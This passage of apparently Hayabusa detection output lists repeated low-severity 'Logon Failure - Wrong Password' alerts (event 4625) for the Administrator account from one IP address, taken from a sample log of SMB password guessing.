NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 